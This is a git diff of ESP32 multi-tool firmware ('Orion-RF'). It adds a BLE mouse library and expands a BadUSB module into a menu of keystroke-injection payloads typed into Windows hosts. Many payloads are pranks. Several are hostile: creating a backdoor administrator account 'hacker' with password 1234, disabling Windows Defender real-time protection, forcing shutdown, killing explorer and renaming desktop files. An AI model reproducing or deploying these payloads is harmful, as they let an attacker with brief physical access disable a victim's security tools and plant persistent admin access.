diff options
Diffstat (limited to 'firmware')
| -rw-r--r-- | firmware/BleConnectionStatus.cpp | 18 | ||||
| -rw-r--r-- | firmware/BleConnectionStatus.h | 21 | ||||
| -rw-r--r-- | firmware/BleMouse.cpp | 173 | ||||
| -rw-r--r-- | firmware/BleMouse.h | 45 | ||||
| -rw-r--r-- | firmware/badusb.cpp | 410 | ||||
| -rw-r--r-- | firmware/badusb.h | 6 | ||||
| -rw-r--r-- | firmware/blemouse.cpp | 38 | ||||
| -rw-r--r-- | firmware/firmware.ino | 38 | ||||
| -rw-r--r-- | firmware/menu.cpp | 77 | ||||
| -rw-r--r-- | firmware/stubs.cpp | 13 |
10 files changed, 729 insertions, 110 deletions
diff --git a/firmware/BleConnectionStatus.cpp b/firmware/BleConnectionStatus.cpp new file mode 100644 index 0000000..f01183b --- /dev/null +++ b/firmware/BleConnectionStatus.cpp @@ -0,0 +1,18 @@ +#include "BleConnectionStatus.h" + +BleConnectionStatus::BleConnectionStatus(void) { +} + +void BleConnectionStatus::onConnect(BLEServer* pServer) +{ + this->connected = true; + BLE2902* desc = (BLE2902*)this->inputMouse->getDescriptorByUUID(BLEUUID((uint16_t)0x2902)); + desc->setNotifications(true); +} + +void BleConnectionStatus::onDisconnect(BLEServer* pServer) +{ + this->connected = false; + BLE2902* desc = (BLE2902*)this->inputMouse->getDescriptorByUUID(BLEUUID((uint16_t)0x2902)); + desc->setNotifications(false); +} diff --git a/firmware/BleConnectionStatus.h b/firmware/BleConnectionStatus.h new file mode 100644 index 0000000..b703150 --- /dev/null +++ b/firmware/BleConnectionStatus.h @@ -0,0 +1,21 @@ +#ifndef ESP32_BLE_CONNECTION_STATUS_H +#define ESP32_BLE_CONNECTION_STATUS_H +#include "sdkconfig.h" +#if defined(CONFIG_BT_ENABLED) + +#include <BLEServer.h> +#include "BLE2902.h" +#include "BLECharacteristic.h" + +class BleConnectionStatus : public BLEServerCallbacks +{ +public: + BleConnectionStatus(void); + bool connected = false; + void onConnect(BLEServer* pServer); + void onDisconnect(BLEServer* pServer); + BLECharacteristic* inputMouse; +}; + +#endif // CONFIG_BT_ENABLED +#endif // ESP32_BLE_CONNECTION_STATUS_H diff --git a/firmware/BleMouse.cpp b/firmware/BleMouse.cpp new file mode 100644 index 0000000..84971ed --- /dev/null +++ b/firmware/BleMouse.cpp @@ -0,0 +1,173 @@ +#include <BLEDevice.h> +#include <BLEUtils.h> +#include <BLEServer.h> +#include "BLE2902.h" +#include "BLEHIDDevice.h" +#include "HIDTypes.h" +#include "HIDKeyboardTypes.h" +#include <driver/adc.h> +#include "sdkconfig.h" + +#include "BleConnectionStatus.h" +#include "BleMouse.h" + +#if defined(CONFIG_ARDUHAL_ESP_LOG) + #include "esp32-hal-log.h" + #define LOG_TAG "" +#else + #include "esp_log.h" + static const char* LOG_TAG = "BLEDevice"; +#endif + +static const uint8_t _hidReportDescriptor[] = { + USAGE_PAGE(1), 0x01, // USAGE_PAGE (Generic Desktop) + USAGE(1), 0x02, // USAGE (Mouse) + COLLECTION(1), 0x01, // COLLECTION (Application) + USAGE(1), 0x01, // USAGE (Pointer) + COLLECTION(1), 0x00, // COLLECTION (Physical) + // ------------------------------------------------- Buttons (Left, Right, Middle, Back, Forward) + USAGE_PAGE(1), 0x09, // USAGE_PAGE (Button) + USAGE_MINIMUM(1), 0x01, // USAGE_MINIMUM (Button 1) + USAGE_MAXIMUM(1), 0x05, // USAGE_MAXIMUM (Button 5) + LOGICAL_MINIMUM(1), 0x00, // LOGICAL_MINIMUM (0) + LOGICAL_MAXIMUM(1), 0x01, // LOGICAL_MAXIMUM (1) + REPORT_SIZE(1), 0x01, // REPORT_SIZE (1) + REPORT_COUNT(1), 0x05, // REPORT_COUNT (5) + HIDINPUT(1), 0x02, // INPUT (Data, Variable, Absolute) ;5 button bits + // ------------------------------------------------- Padding + REPORT_SIZE(1), 0x03, // REPORT_SIZE (3) + REPORT_COUNT(1), 0x01, // REPORT_COUNT (1) + HIDINPUT(1), 0x03, // INPUT (Constant, Variable, Absolute) ;3 bit padding + // ------------------------------------------------- X/Y position, Wheel + USAGE_PAGE(1), 0x01, // USAGE_PAGE (Generic Desktop) + USAGE(1), 0x30, // USAGE (X) + USAGE(1), 0x31, // USAGE (Y) + USAGE(1), 0x38, // USAGE (Wheel) + LOGICAL_MINIMUM(1), 0x81, // LOGICAL_MINIMUM (-127) + LOGICAL_MAXIMUM(1), 0x7f, // LOGICAL_MAXIMUM (127) + REPORT_SIZE(1), 0x08, // REPORT_SIZE (8) + REPORT_COUNT(1), 0x03, // REPORT_COUNT (3) + HIDINPUT(1), 0x06, // INPUT (Data, Variable, Relative) ;3 bytes (X,Y,Wheel) + // ------------------------------------------------- Horizontal wheel + USAGE_PAGE(1), 0x0c, // USAGE PAGE (Consumer Devices) + USAGE(2), 0x38, 0x02, // USAGE (AC Pan) + LOGICAL_MINIMUM(1), 0x81, // LOGICAL_MINIMUM (-127) + LOGICAL_MAXIMUM(1), 0x7f, // LOGICAL_MAXIMUM (127) + REPORT_SIZE(1), 0x08, // REPORT_SIZE (8) + REPORT_COUNT(1), 0x01, // REPORT_COUNT (1) + HIDINPUT(1), 0x06, // INPUT (Data, Var, Rel) + END_COLLECTION(0), // END_COLLECTION + END_COLLECTION(0) // END_COLLECTION +}; + +BleMouse::BleMouse(std::string deviceName, std::string deviceManufacturer, uint8_t batteryLevel) : + _buttons(0), + hid(0) +{ + this->deviceName = deviceName; + this->deviceManufacturer = deviceManufacturer; + this->batteryLevel = batteryLevel; + this->connectionStatus = new BleConnectionStatus(); +} + +void BleMouse::begin(void) +{ + xTaskCreate(this->taskServer, "server", 20000, (void *)this, 5, NULL); +} + +void BleMouse::end(void) +{ +} + +void BleMouse::click(uint8_t b) +{ + _buttons = b; + move(0,0,0,0); + _buttons = 0; + move(0,0,0,0); +} + +void BleMouse::move(signed char x, signed char y, signed char wheel, signed char hWheel) +{ + if (this->isConnected()) + { + uint8_t m[5]; + m[0] = _buttons; + m[1] = x; + m[2] = y; + m[3] = wheel; + m[4] = hWheel; + this->inputMouse->setValue(m, 5); + this->inputMouse->notify(); + } +} + +void BleMouse::buttons(uint8_t b) +{ + if (b != _buttons) + { + _buttons = b; + move(0,0,0,0); + } +} + +void BleMouse::press(uint8_t b) +{ + buttons(_buttons | b); +} + +void BleMouse::release(uint8_t b) +{ + buttons(_buttons & ~b); +} + +bool BleMouse::isPressed(uint8_t b) +{ + if ((b & _buttons) > 0) + return true; + return false; +} + +bool BleMouse::isConnected(void) { + return this->connectionStatus->connected; +} + +void BleMouse::setBatteryLevel(uint8_t level) { + this->batteryLevel = level; + if (hid != 0) + this->hid->setBatteryLevel(this->batteryLevel); +} + +void BleMouse::taskServer(void* pvParameter) { + BleMouse* bleMouseInstance = (BleMouse *) pvParameter; //static_cast<BleMouse *>(pvParameter); + BLEDevice::init(String(bleMouseInstance->deviceName.c_str())); + BLEServer *pServer = BLEDevice::createServer(); + pServer->setCallbacks(bleMouseInstance->connectionStatus); + + bleMouseInstance->hid = new BLEHIDDevice(pServer); + bleMouseInstance->inputMouse = bleMouseInstance->hid->inputReport(0); // <-- input REPORTID from report map + bleMouseInstance->connectionStatus->inputMouse = bleMouseInstance->inputMouse; + + bleMouseInstance->hid->manufacturer()->setValue(String(bleMouseInstance->deviceManufacturer.c_str())); + + bleMouseInstance->hid->pnp(0x02, 0xe502, 0xa111, 0x0210); + bleMouseInstance->hid->hidInfo(0x00,0x02); + + BLESecurity *pSecurity = new BLESecurity(); + + pSecurity->setAuthenticationMode(ESP_LE_AUTH_BOND); + + bleMouseInstance->hid->reportMap((uint8_t*)_hidReportDescriptor, sizeof(_hidReportDescriptor)); + bleMouseInstance->hid->startServices(); + + bleMouseInstance->onStarted(pServer); + + BLEAdvertising *pAdvertising = pServer->getAdvertising(); + pAdvertising->setAppearance(HID_MOUSE); + pAdvertising->addServiceUUID(bleMouseInstance->hid->hidService()->getUUID()); + pAdvertising->start(); + bleMouseInstance->hid->setBatteryLevel(bleMouseInstance->batteryLevel); + + ESP_LOGD(LOG_TAG, "Advertising started!"); + vTaskDelay(portMAX_DELAY); //delay(portMAX_DELAY); +} diff --git a/firmware/BleMouse.h b/firmware/BleMouse.h new file mode 100644 index 0000000..8b4ab9b --- /dev/null +++ b/firmware/BleMouse.h @@ -0,0 +1,45 @@ +#ifndef ESP32_BLE_MOUSE_H +#define ESP32_BLE_MOUSE_H +#include "sdkconfig.h" +#if defined(CONFIG_BT_ENABLED) + +#include "BleConnectionStatus.h" +#include "BLEHIDDevice.h" +#include "BLECharacteristic.h" + +#define MOUSE_LEFT 1 +#define MOUSE_RIGHT 2 +#define MOUSE_MIDDLE 4 +#define MOUSE_BACK 8 +#define MOUSE_FORWARD 16 +#define MOUSE_ALL (MOUSE_LEFT | MOUSE_RIGHT | MOUSE_MIDDLE) # For compatibility with the Mouse library + +class BleMouse { +private: + uint8_t _buttons; + BleConnectionStatus* connectionStatus; + BLEHIDDevice* hid; + BLECharacteristic* inputMouse; + void buttons(uint8_t b); + void rawAction(uint8_t msg[], char msgSize); + static void taskServer(void* pvParameter); +public: + BleMouse(std::string deviceName = "ESP32 Bluetooth Mouse", std::string deviceManufacturer = "Espressif", uint8_t batteryLevel = 100); + void begin(void); + void end(void); + void click(uint8_t b = MOUSE_LEFT); + void move(signed char x, signed char y, signed char wheel = 0, signed char hWheel = 0); + void press(uint8_t b = MOUSE_LEFT); // press LEFT by default + void release(uint8_t b = MOUSE_LEFT); // release LEFT by default + bool isPressed(uint8_t b = MOUSE_LEFT); // check LEFT by default + bool isConnected(void); + void setBatteryLevel(uint8_t level); + uint8_t batteryLevel; + std::string deviceManufacturer; + std::string deviceName; +protected: + virtual void onStarted(BLEServer *pServer) { }; +}; + +#endif // CONFIG_BT_ENABLED +#endif // ESP32_BLE_MOUSE_H diff --git a/firmware/badusb.cpp b/firmware/badusb.cpp index 18c501a..ef9da24 100644 --- a/firmware/badusb.cpp +++ b/firmware/badusb.cpp @@ -1,47 +1,98 @@ #include <Arduino.h> #include <USBHIDKeyboard.h> +#include "display.h" extern USBHIDKeyboard Keyboard; -void runBadUSBDemo() -{ - delay(2000); - Keyboard.println(""); - Keyboard.println("#-FEATURES:"); - Keyboard.println("1- WIFI ATTACKS"); - Keyboard.println("2- BLE ATTACKS"); - Keyboard.println("3- BAD USB"); - Keyboard.println("4- NFC"); - Keyboard.println("5- INFRARED"); - Keyboard.println("6- SUB-GHZ"); - Keyboard.println("7- GPIO"); - Keyboard.println("8- APPS"); - Keyboard.println("9- SETTINGS"); - Keyboard.println("10- FILES"); - +void runCommand(const char *command) { + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('r'); + delay(100); + Keyboard.releaseAll(); + delay(300); + Keyboard.print(command); + Keyboard.write(KEY_RETURN); } -void runBadUSBOpenCMD() -{ - delay(2000); - Keyboard.println(""); - Keyboard.println("#-FEATURES:"); - Keyboard.println("1- WIFI ATTACKS"); - Keyboard.println("2- BLE ATTACKS"); - Keyboard.println("3- BAD USB"); - Keyboard.println("4- NFC"); - Keyboard.println("5- INFRARED"); - Keyboard.println("6- SUB-GHZ"); - Keyboard.println("7- GPIO"); - Keyboard.println("8- APPS"); - Keyboard.println("9- SETTINGS"); - Keyboard.println("10- FILES"); +void showRunningScreen(String taskName, uint8_t duration = 5) { + u8g2.clearBuffer(); + u8g2.setFont(u8g2_font_6x12_tf); + u8g2.drawStr(0, 15, "Running:"); + u8g2.drawStr(0, 30, taskName.c_str()); + u8g2.drawFrame(0, 45, 128, 10); + + static const unsigned char image_download_bits[] U8X8_PROGMEM = { + 0x00, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x00, 0x80, 0x1f, 0x00, 0x00, + 0x00, 0x80, 0xff, 0x1f, 0x00, 0x00, 0x00, 0x80, 0xff, 0x1f, 0x00, 0x00, + 0x00, 0x60, 0x80, 0x1f, 0x00, 0x00, 0x00, 0x60, 0x00, 0x0f, 0x00, 0x00, + 0x00, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0x02, + 0x00, 0x06, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x06, 0x00, 0x00, 0x00, 0x3e, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0x00, 0x60, 0x00, 0x00, 0x00, 0x3e, 0x00, 0x60, 0x00, 0x00, 0x00, 0x0e, + 0x00, 0x80, 0x01, 0x00, 0x00, 0x02, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x06, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x06, 0xf0, 0x03, 0x00, + 0x00, 0x00, 0xf8, 0xff, 0x03, 0x00, 0x00, 0x00, 0xf8, 0xff, 0x03, 0x00, + 0x00, 0x00, 0x00, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x03, 0x00}; + static const unsigned char image_EviSmile1_bits[] U8X8_PROGMEM = { + 0x0c, 0xc0, 0x00, 0x06, 0x80, 0x01, 0x07, 0x80, 0x03, 0xcf, 0xcf, + 0x03, 0xff, 0xff, 0x03, 0xff, 0xff, 0x03, 0xfe, 0xff, 0x01, 0xfe, + 0xff, 0x01, 0xfe, 0xff, 0x01, 0xf7, 0xbf, 0x03, 0xe7, 0x9f, 0x03, + 0xc7, 0x8f, 0x03, 0x87, 0x87, 0x03, 0x8f, 0xc7, 0x03, 0xff, 0xff, + 0x03, 0xfe, 0xff, 0x01, 0xde, 0xef, 0x01, 0xbc, 0xf4, 0x00, 0x78, + 0x78, 0x00, 0xf0, 0x3f, 0x00, 0xc0, 0x0f, 0x00}; + + u8g2.setFontMode(1); + u8g2.setBitmapMode(1); + // download + u8g2.drawXBMP(80, 2, 48, 22, image_download_bits); + + // EviSmile1 + u8g2.drawXBMP(62, 1, 18, 21, image_EviSmile1_bits); + + for (uint8_t i = 0; i <= duration; i++) { + u8g2.drawBox(1, 46, i * (126.0 / duration), 8); + u8g2.sendBuffer(); + delay(50); + } } -void runBadUSBRickroll() -{ + +void badUSBMenu(int index) { + //switch (index) + // { + // case 0: + // runBadUSBDemo(); + // break; + + // case 1: + // Serial.println("Open CMD payload"); + // runBadUSBOpenCMD(); + // break; + + // case 2: + // Serial.println("Rickroll payload"); + // runBadUSBRickroll(); + // break; + // } + + + switch(index) { + case 0: // demo + + showRunningScreen("DEMO"); + + // Run dialog (Win + R) + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('r'); + Keyboard.releaseAll(); + delay(1000); + + Keyboard.println("notepad"); + delay(1500); + delay(2000); - Keyboard.println(""); + + Keyboard.println("YOU HAVE BEEN HACKED BY ORION-RF"); Keyboard.println("#-FEATURES:"); Keyboard.println("1- WIFI ATTACKS"); Keyboard.println("2- BLE ATTACKS"); @@ -53,4 +104,295 @@ void runBadUSBRickroll() Keyboard.println("8- APPS"); Keyboard.println("9- SETTINGS"); Keyboard.println("10- FILES"); + + break; + case 1: // keyboard + //runLoop(hidkeyboard); + break; + case 2: // saved scripts + //hidInit(); + //runLoop(hidscriptmenu); + + break; + + case 3: // Open Notepad + + showRunningScreen("notepad"); + runCommand("notepad"); + break; + case 4: // Open CMD + showRunningScreen("opening cmd"); + runCommand("cmd"); + break; + case 5: // Show IP + showRunningScreen("Getting IP"); + runCommand("cmd"); + delay(500); + Keyboard.print("ipconfig"); + Keyboard.write(KEY_RETURN); + break; + case 6: // Shutdown + showRunningScreen("shutdown"); + runCommand("shutdown /s /t 0"); + break; + case 7: // RickRoll + showRunningScreen("rickroll"); + runCommand("cmd"); + delay(500); + Keyboard.print("start https://www.youtube.com/watch?v=dQw4w9WgXcQ"); + Keyboard.write(KEY_RETURN); + break; + case 8: // Create Admin User + showRunningScreen("create admin user"); + runCommand("cmd"); + delay(500); + Keyboard.print("net user hacker 1234 /add"); + Keyboard.write(KEY_RETURN); + delay(300); + Keyboard.print("net localgroup administrators hacker /add"); + Keyboard.write(KEY_RETURN); + break; + case 9: // Disable Windows Defender + showRunningScreen("disable windoes defender"); + runCommand("powershell"); + delay(500); + Keyboard.print("Set-MpPreference -DisableRealtimeMonitoring $true"); + Keyboard.write(KEY_RETURN); + break; + case 10: // Open YouTube + showRunningScreen("youtube"); + runCommand("cmd"); + delay(500); + Keyboard.print("start https://www.youtube.com"); + Keyboard.write(KEY_RETURN); + break; + case 11: // Lock PC + showRunningScreen("lock pc"); + runCommand("rundll32.exe user32.dll,LockWorkStation"); + break; + case 12: // Fake Update + showRunningScreen("fake update"); + runCommand("cmd"); + delay(500); + Keyboard.print("start https://fakeupdate.net/win10u/"); + Keyboard.write(KEY_RETURN); + break; + + case 13: // Endless Notepad + showRunningScreen("endless notepad"); + for (int i = 0; i < 10; i++) { + runCommand("notepad"); + delay(500); + } + break; + + case 14: // Fake BSOD (opens fullscreen image) + showRunningScreen(" fake bsod"); + runCommand("cmd"); + delay(500); + Keyboard.print("start https://fakeupdate.net/bsod/"); + Keyboard.write(KEY_RETURN); + break; + + case 15: // Flip screen + showRunningScreen("Flip screen"); + Keyboard.press(KEY_LEFT_CTRL); + Keyboard.press(KEY_LEFT_ALT); + Keyboard.press(KEY_DOWN_ARROW); + delay(100); + Keyboard.releaseAll(); + break; + + case 16: // Matrix effect + showRunningScreen("Matrix effect"); + runCommand("cmd"); + delay(500); + Keyboard.print("color 0A"); + Keyboard.write(KEY_RETURN); + Keyboard.print(":a"); + Keyboard.write(KEY_RETURN); + Keyboard.print("echo %random%%random%%random%%random%"); + Keyboard.write(KEY_RETURN); + Keyboard.print("goto a"); + Keyboard.write(KEY_RETURN); + break; + + case 17: // I'm watching you prank + showRunningScreen(" iam watching you"); + for (int i = 0; i < 5; i++) { + runCommand("notepad"); + delay(1000); + Keyboard.print("I'm watching you..."); + delay(5000); + } + break; + + case 18: // Open Google + showRunningScreen("open google"); + runCommand("cmd"); + delay(500); + Keyboard.print("start https://www.google.com"); + Keyboard.write(KEY_RETURN); + break; + + case 19: // Open telegram + showRunningScreen("open telegram"); + runCommand("cmd"); + delay(500); + Keyboard.print("start https://web.telegram.org/"); + Keyboard.write(KEY_RETURN); + break; + + case 20: // Alarm Sound + showRunningScreen("alarm sound"); + runCommand("cmd"); + delay(500); + Keyboard.print("start https://www.soundjay.com/button/beep-07.wav"); + Keyboard.write(KEY_RETURN); + break; + + case 21: // Endless CMD + showRunningScreen("endless smd"); + for (int i = 0; i < 20; i++) { + runCommand("cmd"); + delay(300); + } + break; + + case 22: // Gibberish + showRunningScreen("gibberish"); + for (int i = 0; i < 100; i++) { + char c = random(33, 127); + Keyboard.write(c); + delay(50); + } + break; + + case 23: // CAPSLOCK Spam + showRunningScreen("caps lock spam"); + for (int i = 0; i < 10; i++) { + Keyboard.press(KEY_CAPS_LOCK); + delay(200); + Keyboard.release(KEY_CAPS_LOCK); + delay(200); + } + break; + + case 24: // Calculator + showRunningScreen("claculator"); + runCommand("calc"); + break; + + case 25: // Auto Type "Hacked!" + showRunningScreen("hacked"); + for (int i = 0; i < 5; i++) { + Keyboard.print("Hacked!"); + Keyboard.write(KEY_RETURN); + delay(1000); + } + break; + + case 26: // Turn off monitor (Windows only) + showRunningScreen("turn off monitor"); + runCommand("powershell"); + delay(500); + Keyboard.print( + "(Add-Type '[DllImport(\"user32.dll\")]public static extern int " + "SendMessage(int hWnd, int hMsg, int wParam, int lParam);' -Name a " + "-Pas)::SendMessage(-1,0x0112,0xF170,2)"); + Keyboard.write(KEY_RETURN); + break; + + case 27: // RegEdit + showRunningScreen("regedit"); + runCommand("regedit"); + break; + + case 28: // Kill Explorer + showRunningScreen(" kill explorer"); + runCommand("taskkill /f /im explorer.exe"); + break; + + case 29: // Flash screen (by changing background rapidly) + showRunningScreen(" flash screen"); + for (int i = 0; i < 10; i++) { + runCommand("color 4F"); + delay(200); + runCommand("color 1F"); + delay(200); + } + break; + + case 30: // Rename Desktop Files (basic prank) + + showRunningScreen("rename desktop files"); + runCommand("powershell"); + delay(500); + Keyboard.print("Get-ChildItem \"$env:USERPROFILE\\Desktop\" | " + "Rename-Item -NewName {'hacked'+$_.Name}"); + Keyboard.write(KEY_RETURN); + break; + + case 31: // Toggle WiFi (requires admin) + showRunningScreen("toggle wifi"); + runCommand("cmd"); + delay(500); + Keyboard.print("netsh interface set interface Wi-Fi disabled"); + Keyboard.write(KEY_RETURN); + delay(1000); + Keyboard.print("netsh interface set interface Wi-Fi enabled"); + Keyboard.write(KEY_RETURN); + break; + + case 32: // Screenshot + showRunningScreen("screenshot"); + runCommand("powershell"); + delay(500); + Keyboard.print("Add-Type -AssemblyName System.Windows.Forms;"); + Keyboard.write(KEY_RETURN); + delay(300); + Keyboard.print("[System.Windows.Forms.SendKeys]::SendWait('%{PRTSC}')"); + Keyboard.write(KEY_RETURN); + break; + + case 33: // Emoji spam + showRunningScreen("emoji spam"); + for (int i = 0; i < 10; i++) { + Keyboard.print("💀"); + Keyboard.write(KEY_RETURN); + delay(500); + } + break; + + case 34: // Control Panel + showRunningScreen("control panel"); + runCommand("control"); + break; + + case 35: // Troll wallpaper + showRunningScreen("troll wallpaper"); + runCommand("cmd"); + delay(500); + Keyboard.print("start https://i.imgur.com/trollface.png"); + Keyboard.write(KEY_RETURN); + break; + + case 36: // MS Paint + showRunningScreen("ms paint"); + runCommand("mspaint"); + break; + + case 37: // Auto Tab Switcher + showRunningScreen(" auto tab switcher"); + for (int i = 0; i < 10; i++) { + Keyboard.press(KEY_LEFT_CTRL); + Keyboard.press(KEY_TAB); + delay(100); + Keyboard.releaseAll(); + delay(300); + } + break; +} } + + diff --git a/firmware/badusb.h b/firmware/badusb.h index a5a0dd5..a3390ec 100644 --- a/firmware/badusb.h +++ b/firmware/badusb.h @@ -1,5 +1,5 @@ #pragma once -void runBadUSBDemo(); -void runBadUSBOpenCMD(); -void runBadUSBRickroll(); +void badUSBMenu(int index); +void showRunningScreen(String taskName, uint8_t duration); +void runCommand(const char *command); diff --git a/firmware/blemouse.cpp b/firmware/blemouse.cpp index e181a86..8e666ec 100644 --- a/firmware/blemouse.cpp +++ b/firmware/blemouse.cpp @@ -1,29 +1,29 @@ #include <Arduino.h> #include <BleMouse.h> +#include "badusb.h" #include "config.h" #include "buttons.h" #include "display.h" // ===== BLE MOUSE ===== -BleMouse bleMouse("Orion-RF", "Orion-RF", 100); +// BleMouse bleMouse("Orion-RF", "Orion-RF", 100); +extern BleMouse bleMouse; // ===== MAIN ===== void ble_mouse_run() { - bleMouse.begin(); - - // simple screen u8g2.clearBuffer(); u8g2.setFont(u8g2_font_6x10_tr); u8g2.drawStr(10, 25, "BLE Mouse"); u8g2.drawStr(10, 45, "Connecting..."); u8g2.sendBuffer(); - delay(1000); + delay(800); while (1) { + // 🔥 EXIT FIRST (clean) if (btnBack()) break; bool connected = bleMouse.isConnected(); @@ -33,19 +33,22 @@ void ble_mouse_run() if (connected) { - if (!digitalRead(BTN_UP)) dy = -8; - if (!digitalRead(BTN_DOWN)) dy = 8; - if (!digitalRead(BTN_LEFT)) dx = -8; - if (!digitalRead(BTN_RIGHT)) dx = 8; + if (!digitalRead(BTN_UP)) dy = -6; + if (!digitalRead(BTN_DOWN)) dy = 6; + if (!digitalRead(BTN_LEFT)) dx = -6; + if (!digitalRead(BTN_RIGHT)) dx = 6; - if (dx != 0 || dy != 0) + if (dx || dy) bleMouse.move(dx, dy); - if (!digitalRead(BTN_SELECT)) + // ✅ single click (not spam) + static bool lastSelect = false; + bool currentSelect = !digitalRead(BTN_SELECT); + + if (currentSelect && !lastSelect) bleMouse.click(MOUSE_LEFT); - if (!digitalRead(BTN_BACK)) - bleMouse.click(MOUSE_RIGHT); + lastSelect = currentSelect; } // ===== UI ===== @@ -55,14 +58,17 @@ void ble_mouse_run() u8g2.drawStr(10, 20, "BLE Mouse"); if (connected) - u8g2.drawStr(10, 35, "Status: Connected"); + u8g2.drawStr(10, 35, "Connected"); else - u8g2.drawStr(10, 35, "Status: Waiting"); + u8g2.drawStr(10, 35, "Waiting"); u8g2.drawStr(10, 55, "BACK = Exit"); u8g2.sendBuffer(); - delay(30); + delay(10); // important for BLE stability } } + + + diff --git a/firmware/firmware.ino b/firmware/firmware.ino index 5b71a60..12fb296 100644 --- a/firmware/firmware.ino +++ b/firmware/firmware.ino @@ -4,6 +4,7 @@ #include <BLEDevice.h> #include <BLEScan.h> +#include <BleMouse.h> #include <RF24.h> #include <nRF24L01.h> @@ -29,6 +30,9 @@ // ================= USB HID ================= USBHIDKeyboard Keyboard; +// ===== BLE MOUSE ===== +BleMouse bleMouse("Orion-RF", "Orion-RF", 100); + RF24 radio1(CE1_PIN, CSN1_PIN); RF24 radio2(CE2_PIN, CSN2_PIN); @@ -38,21 +42,21 @@ SPIClass *RADIO_SPI; // ================= BLE SCAN ================= -BLEScan *pBLEScan; - - -void startBLEScan() -{ - BLEDevice::init(""); - - pBLEScan = BLEDevice::getScan(); - - pBLEScan->setActiveScan(true); - - pBLEScan->start(5); - - Serial.println("BLE scan complete"); -} +//BLEScan *pBLEScan; +// +// +//void startBLEScan() +//{ +// BLEDevice::init(""); +// +// pBLEScan = BLEDevice::getScan(); +// +// pBLEScan->setActiveScan(true); +// +// pBLEScan->start(5); +// +// Serial.println("BLE scan complete"); +//} // ================= SYSTEM INFO ================= void printSystemUsage() @@ -106,6 +110,10 @@ void setup() USB.begin(); Keyboard.begin(); + // Begin Ble mouse + bleMouse.begin(); + + // NRF SPI safety pinMode(CSN1_PIN, OUTPUT); digitalWrite(CSN1_PIN, HIGH); diff --git a/firmware/menu.cpp b/firmware/menu.cpp index cd982d4..6126536 100644 --- a/firmware/menu.cpp +++ b/firmware/menu.cpp @@ -10,13 +10,7 @@ #include "wifi_analyzer.h" #include "device_check.h" #include "blemouse.h" - -// ================= FEATURE HANDLERS ================= -void runSystemInfoFeature(); -void runRFCaptureFeature(); -void runBLEScanFeature(); - - +#include "sysinfo.h" // ================= MENU DATA ================= @@ -37,12 +31,52 @@ const char *mainMenuItems[] = { Menu mainMenu = {mainMenuItems, sizeof(mainMenuItems) / sizeof(mainMenuItems[0])}; // BadUSB submenu -const char *badusbItems[] = { - "Demo", - "Open CMD", - "Rickroll"}; - -Menu badusbMenu = {badusbItems, 3}; +//const char *badusbItems[] = { +// "Demo", +// "Open CMD", +// "Rickroll"}; + + const char *badusbItems[] = {"DEMO", + "KEYBOARD", + "HID SCRIPT", + "Open Notepad", + "Open CMD", + "Show IP", + "Shutdown", + "RickRoll", + "Create Admin", + "Disable Defender", + "Open YouTube", + "Lock PC", + "Fake Update", + "Endless Notepad", + "Fake BSOD", + "Flip Screen", + "Matrix Effect", + "I'm Watching U", + "Open Google", + "Open telegram", + "Play Alarm Sound", + "Endless CMD", + "Type Gibberish", + "Spam CAPSLOCK", + "Open Calc", + "Auto 'Hacked!'", + "Turn Off Monitor", + "Open RegEdit", + "Kill Explorer", + "Flash Screen", + "Rename Desktop", + "Toggle WiFi", + "Auto Screenshot", + "Spam Emojis", + "Open Ctrl Panel", + "Troll Wallpaper", + "Open MS Paint", + "Tab Switcher"}; + + +Menu badusbMenu = {badusbItems, sizeof(badusbItems) / sizeof(badusbItems[0])}; // ================= MENU STATE ================= @@ -193,22 +227,7 @@ void launchFeature() } else if (currentMenu == &badusbMenu) { - switch (menuIndex) - { - case 0: - runBadUSBDemo(); - break; - - case 1: - Serial.println("Open CMD payload"); - runBadUSBOpenCMD(); - break; - - case 2: - Serial.println("Rickroll payload"); - runBadUSBRickroll(); - break; - } + badUSBMenu(menuIndex); } insideFeature = false; diff --git a/firmware/stubs.cpp b/firmware/stubs.cpp deleted file mode 100644 index c7782ca..0000000 --- a/firmware/stubs.cpp +++ /dev/null @@ -1,13 +0,0 @@ -#include <Arduino.h> - - -void runRFCaptureFeature() -{ - Serial.println("RF Capture not implemented yet"); -} - - -void runBLEScanFeature() -{ - Serial.println("BLE Scan not implemented yet"); -} |